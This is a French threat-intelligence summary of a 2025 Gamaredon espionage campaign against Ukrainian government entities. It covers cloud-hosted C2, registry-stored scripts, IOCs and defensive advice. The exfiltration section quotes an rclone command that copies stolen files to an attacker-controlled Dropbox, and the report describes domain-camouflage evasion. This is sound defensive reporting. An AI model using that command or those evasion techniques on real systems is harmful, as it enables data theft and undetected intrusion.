Executive Summary
Le groupe APT-C-53 (Gamaredon), soutenu par la Russie et actif depuis 2013, poursuit ses campagnes d’espionnage contre les entités gouvernementales et militaires ukrainiennes.
En 2025, ses opérations se distinguent par une migration dynamique des infrastructures de commande et contrôle vers des services cloud légitimes (Microsoft Dev Tunnels, Cloudflare Workers) et l’usage de techniques avancées de camouflage pour échapper à la détection.
La chaîne d’attaque repose sur des scripts PowerShell et VBScript furtifs, stockés dans le registre Windows et utilisant des services de stockage en ligne tels que Dropbox pour exfiltrer des données sensibles.
Les indicateurs de compromission incluent de multiples domaines C2, sous-domaines Cloudflare, ainsi que plusieurs empreintes MD5 de fichiers malveillants.
Le contexte
Gamaredon, également connu sous les noms de Primitive Bear, Winterflounder ou BlueAlpha, mène depuis plus d’une décennie des opérations visant à voler des informations sensibles et perturber les infrastructures ukrainiennes.
Les chercheurs du 360 Threat Intelligence Center ont observé en septembre 2025 une nouvelle vague d’attaques caractérisée par l’exploitation de services cloud à des fins de dissimulation et d’exfiltration.
Leurs tactiques et techniques observées
1. Migration dynamique des C2
- Utilisation initiale de plateformes comme Telegram Telegraph pour héberger des liens malveillants.
- Basculement rapide vers Microsoft Dev Tunnels, générant des sous-domaines temporaires
*.devtunnels.msavec certificats TLS valides émis par Microsoft. - Mise en œuvre de la technique White-listed Domain Camouflage, insérant des domaines légitimes (ex. wise.com, megamarket.ua) dans les URL pour tromper les systèmes de sécurité.
Avantages pour l’attaquant :
- Masquage de l’IP réelle derrière des nœuds Microsoft.
- Capacité de rotation rapide (minutes à heures) des sous-domaines.
- Dissimulation du trafic malveillant dans du flux HTTPS légitime.
2. Abus de services cloud pour la distribution
- Cloudflare Workers utilisés pour distribuer les charges utiles.
- Génération automatisée de sous-domaines à durée de vie limitée (≤ 48h).
- Stratégie de distribution en deux étapes :
- Première étape : livraison de scripts via sous-domaines Cloudflare.
- Deuxième étape : exécution d’un VBScript placé dans
%TEMP%, avec nom aléatoire (tmpXXXX.tmp.vbs).
3. Persistance et exécution furtive
- Stockage d’artefacts dans le registre Windows :
HKCU:\System\*. - Exécution dynamique via PowerShell pour contourner les détections statiques.
- Simulation de fichiers Office temporaires dans
%localappdata%\Winwordini.DATpour masquer les données avant exfiltration.
4. Exfiltration de données
- Usage de
rclone.exepour synchroniser les fichiers volés avec un espace Dropbox contrôlé par l’attaquant. - Exemple de commande :
rclone.exe copy %UserProfile%\AppData\Local\Temp\1750756392913 dropbox:DP27-KA-000422_585516477/ - Exfiltration chiffrée intégrée au flux Dropbox, ce qui rend l’analyse réseau traditionnelle moins efficace.
Attribution
Les caractéristiques suivantes permettent d’attribuer par les chercheurs cette campagne à APT-C-53 (Gamaredon) :
- Réutilisation d’infrastructures déjà observées lors de précédentes attaques.
- Adoption de tactiques de domain shadowing et d’abus de services cloud déjà documentées.
- Ciblage exclusif d’entités gouvernementales ukrainiennes.
- Utilisation de domaines et infrastructures liés à la sphère russe (
.ru).
Quelques indicateurs de compromission (IOC)
Domaines C2 et relais malveillants
litanq[.]ru
fulagam[.]ru
bulam[.]ru
*.euw.devtunnels[.]ms
dvofiuao.3150wild.workers[.]dev
tskqbu.bronzevere.workers[.]dev
bdslmtlqh.bronzevere.workers[.]dev
jqrwbrbj.bronzevere.workers[.]dev
khycpsgbu.previoussusanna.workers[.]dev
oexvrm.embarrassed3627.workers[.]dev
xuwj.goldjan.workers[.]dev
gohiz.griercrimson.workers[.]dev
Empreintes MD5
98b540aeb2e2350f74ad36ddb4d3f66f
0459531e3cbc84ede6a1a75846a87495
f3deebe705478ec1a4ec5538ac3669cb
67896b57a4dcf614fb22283c130ab78b
d2c551812c751332b74b0517e76909f2
9258a427c782cd8d7dcf25dc0d661239
023429e53d32fa29e4c7060c8f3d37db
Recommandations de défense
- Sécuriser la messagerie : filtrage avancé pour bloquer les pièces jointes malveillantes (LNK, archives).
- Surveiller les registres et logs PowerShell : détection d’entrées suspectes dans
HKCU:\System. - Durcir la sécurité des terminaux : EDR capable de repérer les comportements anormaux, scans réguliers.
- Surveillance réseau renforcée : inspection des connexions vers Dev Tunnels et Cloudflare Workers inhabituels.
- Contrôler l’usage d’outils tiers comme
rclone.exeafin de limiter les exfiltrations non autorisées.
Sources
Sources primaires : 360 Threat Intelligence Center (360高级威胁研究院).
Source secondaire : republication via CN-SEC.com. https://cn-sec.com/archives/4411359.html
A retenir sur les sources utilisées:
CN-SEC.com est un site web chinois qui fonctionne comme une plateforme communautaire de veille en cybersécurité. On y trouve :
- des traductions ou republications d’articles techniques venant d’autres sources (blogs de recherche, bulletins d’éditeurs, publications d’équipes de Threat Intelligence),
- des analyses originales rédigées par des chercheurs chinois,
- des contributions de communautés locales de sécurité offensive et défensive.
C’est donc un agrégateur et relais de contenus techniques avant tout, très suivi en Asie, mais pas forcément la source primaire des rapports. Dans notre cas, l’article sur APT-C-53 (Gamaredon) est en fait une republication d’une analyse initialement produite par le 360高级威胁研究院 (360 Threat Intelligence Center), la cellule de recherche avancée de Qihoo 360, un acteur majeur de la cybersécurité en Chine.
En résumé sur la qualification des sources :
- CN-SEC.com = site communautaire chinois orienté sécurité, qui republie ou centralise des contenus techniques.
- Source primaire = 360 Threat Intelligence Center, qui a publié cette analyse le 7 septembre 2025 sur son compte officiel (WeChat / blog).
Enjoy !
